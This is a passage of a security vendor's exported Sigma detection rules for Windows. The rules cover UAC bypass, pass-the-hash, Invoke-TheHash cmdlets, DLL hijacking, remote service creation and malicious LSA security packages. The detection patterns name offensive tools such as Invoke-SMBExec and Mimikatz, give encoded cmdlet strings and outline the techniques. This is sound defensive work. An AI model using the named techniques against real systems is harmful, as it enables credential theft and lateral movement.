"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084438Z",
"creation_date": "2026-03-23T11:45:34.084441Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084445Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"
],
"name": "t1548_002_post_uac_bypass_compmgmtlauncher.yml",
"content": "title: UAC Bypass Executed via CompMgmtLauncher\nid: 39c97768-09b3-4aa2-adfb-07c4804f4ccf\ndescription: |\n Detects an unusual process being spawned by CompMgmtLauncher.exe.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to check the spawned process for suspicious activities.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\ndate: 2021/01/04\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\CompMgmtLauncher.exe'\n\n filter_image:\n Image:\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\Syswow64\\mmc.exe'\n - '?:\\Windows\\system32\\ServerManager.exe'\n - '?:\\Program Files\\Google\\Drive File Stream\\\\*\\crashpad_handler.exe'\n - '?:\\Program Files (x86)\\WinRAR\\RarExtLoader.exe'\n # C:\\Program Files (x86)\\Adobe\\Acrobat 2015\\Acrobat\\acrotray.exe\n - '?:\\Program Files (x86)\\Adobe\\Acrobat 20??\\Acrobat\\acrotray.exe'\n - '?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\acrotray.exe'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat DC\\Acrobat\\acrotray.exe'\n - '?:\\program files\\path copy copy\\pathcopycopysettings.exe'\n - '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe'\n - '?:\\Program Files (x86)\\NCH Software\\ExpressZip\\expresszip.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39c97768-09b3-4aa2-adfb-07c4804f4ccf",
"rule_name": "UAC Bypass Executed via CompMgmtLauncher",
"rule_description": "Detects an unusual process being spawned by CompMgmtLauncher.exe.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to check the spawned process for suspicious activities.\n",
"rule_creation_date": "2021-01-04",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39cc3158-01b2-4bd7-8ac4-dcc5e3853eb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073151Z",
"creation_date": "2026-03-23T11:45:34.073153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073158Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://stealthbits.com/blog/how-to-detect-pass-the-hash-attacks/",
"https://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/",
"https://attack.mitre.org/techniques/T1550/002/"
],
"name": "t1550_003_pass_the_hash.yml",
"content": "title: Pass-the-Hash Attack Detected\nid: 39cc3158-01b2-4bd7-8ac4-dcc5e3853eb0\ndescription: |\n Detects s successful logon using the Pass-the-Hash technique.\n A Pass-the-Hash attack requires having an administrator account and is used to move laterally inside an Active Directory network.\n This attack allows the usage of a password hash for authentication without the need to brute-force it to obtain the cleartext password.\n The credential dumper Mimikatz is often used by attackers to perform this attack, but all red team frameworks implement this technique.\n When a user executes the command \"runas.exe\" with the \"/netonly\" flag, this alert will be triggered, and can be considered a false positive.\n It is recommended to investigate the context of this action to determine its legitimacy.\n Checking the fields 'SubjectUserName' and 'TargetOutboundUserName' give useful information about the credentials involved.\nreferences:\n - https://stealthbits.com/blog/how-to-detect-pass-the-hash-attacks/\n - https://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2021/09/30\nmodified: 2025/04/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.PassTheHash\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4624\n LogonType: '9'\n LogonProcessName: 'seclogo'\n AuthenticationPackageName: 'Negotiate'\n\n exclusion_itrust:\n SubjectUserName|endswith: '$'\n TargetUserSid: 'S-1-5-18'\n TargetOutboundUserName:\n - 'Domain_Admin_???????'\n - 'Support_???????'\n exclusion_itrust_no_mapping:\n SubjectUserName|endswith: '$'\n event_data.TargetUserSid: 'S-1-5-18'\n event_data.TargetOutboundUserName:\n - 'Domain_Admin_???????'\n - 
'Support_???????'\n\n # Netwrix Auditor\n exclusion_netwrix:\n SubjectUserName:\n - 'SYSTEM'\n - 'Système'\n TargetUserSid: 'S-1-5-18'\n TargetOutboundUserName:\n - 'netwrixsvc'\n - 'NETWRIXAD_GMSA$'\n - 'svc_netwrix'\n - 'svc_netwrix@*'\n exclusion_netwrix_no_mapping:\n SubjectUserName:\n - 'SYSTEM'\n - 'Système'\n event_data.TargetUserSid: 'S-1-5-18'\n event_data.TargetOutboundUserName:\n - 'netwrixsvc'\n - 'NETWRIXAD_GMSA$'\n - 'svc_netwrix'\n - 'svc_netwrix@*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39cc3158-01b2-4bd7-8ac4-dcc5e3853eb0",
"rule_name": "Pass-the-Hash Attack Detected",
"rule_description": "Detects a successful logon using the Pass-the-Hash technique.\nA Pass-the-Hash attack requires a previously captured NTLM hash (typically dumped with administrator privileges on a compromised host) and is used to move laterally inside an Active Directory network.\nThis attack allows the usage of a password hash for authentication without the need to crack it to obtain the cleartext password.\nThe credential dumper Mimikatz is often used by attackers to perform this attack, but most red team frameworks implement this technique.\nWhen a user executes the command \"runas.exe\" with the \"/netonly\" flag, this alert will also be triggered (it produces the same logon type 9 through the seclogo logon process), and can be considered a false positive.\nIt is recommended to investigate the context of this action to determine its legitimacy.\nChecking the fields 'SubjectUserName' and 'TargetOutboundUserName' gives useful information about the credentials involved.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-04-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39d92e23-6a48-41c3-ab96-57747580f3e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595934Z",
"creation_date": "2026-03-23T11:45:34.595937Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595945Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Invoke-TheHash",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1550/002/"
],
"name": "t1059_001_powershell_malicious_cmdlet_invoke_thehash_cmd.yml",
"content": "title: Malicious PowerShell Invoke-TheHash Commandlets in Command-line\nid: 39d92e23-6a48-41c3-ab96-57747580f3e1\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\n Invoke-TheHash contains PowerShell functions for performing pass-the-hash attacks over WMI and SMB protocols.\n This module enables lateral movement by abusing captured NTLM hashes through .NET TCPClient, allowing attackers to authenticate and execute commands on remote systems without requiring the actual password.\n Common command patterns include Invoke-SMBExec, Invoke-WMIExec, and related NTLMv2 authentication attempts.\n Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\n It is recommended to investigate PowerShell logs for Invoke-TheHash command patterns, correlate with network authentication attempts, and identify affected systems while revoking compromised NTLM hashes.\nreferences:\n - https://github.com/Kevin-Robertson/Invoke-TheHash\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2022/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.InvokeTheHash\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # WMI Command Execution Function\n - 'Invoke-WMIExec'\n - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA'\n - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw'\n - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA'\n # SMB Command Execution Function\n - 
'Invoke-SMBExec'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBFAHgAZQBjA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIARQB4AGUAYw'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAEUAeABlAGMA'\n # User, Group and NetSession and Share enumeration.\n - 'Invoke-SMBEnum'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBFAG4AdQBtA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIARQBuAHUAbQ'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAEUAbgB1AG0A'\n # SMB Client, file sharing\n - 'Invoke-SMBClient'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBDAGwAaQBlAG4AdA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIAQwBsAGkAZQBuAHQA'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAEMAbABpAGUAbgB0A'\n # Running above functions against multiple targets\n - 'Invoke-TheHash'\n - 'SQBuAHYAbwBrAGUALQBUAGgAZQBIAGEAcwBoA'\n - 'kAbgB2AG8AawBlAC0AVABoAGUASABhAHMAaA'\n - 'JAG4AdgBvAGsAZQAtAFQAaABlAEgAYQBzAGgA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39d92e23-6a48-41c3-ab96-57747580f3e1",
"rule_name": "Malicious PowerShell Invoke-TheHash Commandlets in Command-line",
"rule_description": "Detects Invoke-TheHash cmdlet names, in plain or base64-encoded form, in PowerShell command lines.\nInvoke-TheHash contains PowerShell functions for performing pass-the-hash attacks over WMI and SMB protocols.\nThis module enables lateral movement by abusing captured NTLM hashes through .NET TCPClient, allowing attackers to authenticate and execute commands on remote systems without requiring the actual password.\nCommon command patterns include Invoke-SMBExec, Invoke-WMIExec, and related NTLMv2 authentication attempts.\nAuthentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\nIt is recommended to investigate PowerShell logs for Invoke-TheHash command patterns, correlate with network authentication attempts, and identify affected systems. An NTLM hash stays valid until the account password changes, so reset the passwords of the accounts whose hashes were exposed.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ac3b18f-d76a-4a86-ac8f-26c0cc249a24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078589Z",
"creation_date": "2026-03-23T11:45:34.078591Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078596Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmcertinst.yml",
"content": "title: DLL Hijacking via dmcertinst.exe\nid: 3ac3b18f-d76a-4a86-ac8f-26c0cc249a24\ndescription: |\n Detects potential Windows DLL Hijacking via dmcertinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmcertinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\certenroll.dll'\n - '\\DMCmnUtils.dll'\n - '\\DSPARSE.dll'\n - '\\iri.dll'\n - '\\msvcp110_win.dll'\n - '\\ncrypt.dll'\n - '\\omadmapi.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ac3b18f-d76a-4a86-ac8f-26c0cc249a24",
"rule_name": "DLL Hijacking via dmcertinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmcertinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ad4fcf4-b08f-42fb-a82a-d6354c186bea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095635Z",
"creation_date": "2026-03-23T11:45:34.095637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/003/",
"https://attack.mitre.org/techniques/T1569/002/",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_service_admin_share_create.yml",
"content": "title: Service Created Remotely via Admin Share\nid: 3ad4fcf4-b08f-42fb-a82a-d6354c186bea\ndescription: |\n Detects the creation of a service executing a remote image, a technique commonly employed in lateral movement.\n This method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\n While legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\n It is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\n - https://attack.mitre.org/techniques/T1569/002/\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2025/06/11\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.003\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Service\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: service\ndetection:\n selection:\n OperationType: 'create'\n ServiceCommandLine|contains:\n - 'C$'\n - 'ADMIN$'\n AgentVersion|gte|version: 4.9.0\n IsRemote: 'true'\n\n exclusion_rayinventory:\n ServiceCommandLine: '\\\\localhost\\ADMIN$\\Temp\\RayVentoryScanEngine\\mgsreservice.exe'\n ServiceName: 'RaynetRVPRE'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ad4fcf4-b08f-42fb-a82a-d6354c186bea",
"rule_name": "Service Created Remotely via Admin Share",
"rule_description": "Detects the creation of a service executing a remote image, a technique commonly employed in lateral movement.\nThis method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\nWhile legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\nIt is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\n",
"rule_creation_date": "2025-06-11",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ada4475-911a-4c93-a5bd-9de28d773cd0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620858Z",
"creation_date": "2026-03-23T11:45:34.620860Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620864Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package",
"https://hadess.io/pwning-the-domain-persistence/",
"https://attack.mitre.org/techniques/T1547/005/"
],
"name": "t1547_005_persistence_lsa_security_package.yml",
"content": "title: LSA Security Package Installed\nid: 3ada4475-911a-4c93-a5bd-9de28d773cd0\ndescription: |\n Detects modifications to the LSA Security Packages registry key (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages), which is used to register new Security Support Providers (SSPs).\n This technique is commonly abused by attackers to install malicious SSPs, allowing them to intercept credentials and maintain persistence by injection their DLLs into the LSASS process.\n It is recommended to investigate the registry details for any unrecognized programs in your environment, and whitelist any recurring legitimate details.\n If this action is malicious, restore the registry key to its baseline configuration while reviewing authentication logs for potential credential theft.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package\n - https://hadess.io/pwning-the-domain-persistence/\n - https://attack.mitre.org/techniques/T1547/005/\ndate: 2020/09/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.005\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Security Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages'\n\n filter_empty:\n Details:\n - '(Empty)'\n - '\"\"'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe 
-k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_vmware:\n Details:\n - '\"\";wsauth'\n - '\"\";VMWSU.DLL'\n - '\"\";VMWSU_V1_0.DLL'\n - '\"\";wsauth;VMWSU.DLL'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_citrix1:\n Details:\n - '?:\\Program Files (x86)\\Citrix\\system32\\ctxauth;\"\"'\n - 'ctxauth;\"\"'\n\n exclusion_citrix2:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n Details|contains: '?:\\PROGRA~?\\Citrix\\System32\\ctxauth;'\n\n exclusion_legit:\n Details:\n - 'kerberos;msv1_0;pku2u;wdigest;tspkg;cloudap;schannel'\n - 'kerberos;msv1_0;pku2u;wdigest;cloudAP;tspkg;schannel'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg;pku2u'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg;pku2u;\"\";wsauth'\n - 'kerberos;msv1_0;schannel;wdigest;tspkg;pku2u;\"\"'\n - 'pku2u;wdigest;kerberos;msv1_0;tspkg;schannel;cloudAP'\n - 'pku2u;wdigest;cloudAP;kerberos;msv1_0;tspkg;schannel'\n - 'kerberos;msv1_0;pku2u;wdigest;tspkg;schannel;cloudAP'\n - '\"\";?:\\Program Files\\Yubico\\Login\\Yubico.AuthenticationPackage.dll'\n - ';?:\\Program Files\\Yubico\\Login\\Yubico.AuthenticationPackage.dll'\n - '\"\";tspkg'\n - '\"\";msoidssp'\n - '\"\";msoidssp;wsauth'\n\n exclusion_poqexec:\n Image: '?:\\Windows\\System32\\poqexec.exe'\n ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_ivanti:\n Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\System32\\lsass.exe'\n Details|contains: ';?:\\Program Files\\Ivanti\\Ivanti Cloud 
Agent\\UWM_AC_ENGINE.WIN64\\AMLsaAP'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ada4475-911a-4c93-a5bd-9de28d773cd0",
"rule_name": "LSA Security Package Installed",
"rule_description": "Detects modifications to the LSA Security Packages registry key (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages), which is used to register new Security Support Providers (SSPs).\nThis technique is commonly abused by attackers to install malicious SSPs, allowing them to intercept credentials and maintain persistence by injection their DLLs into the LSASS process.\nIt is recommended to investigate the registry details for any unrecognized programs in your environment, and whitelist any recurring legitimate details.\nIf this action is malicious, restore the registry key to its baseline configuration while reviewing authentication logs for potential credential theft.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b081a6b-6195-46fe-924f-a649c6059107",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621832Z",
"creation_date": "2026-03-23T11:45:34.621834Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621838Z",
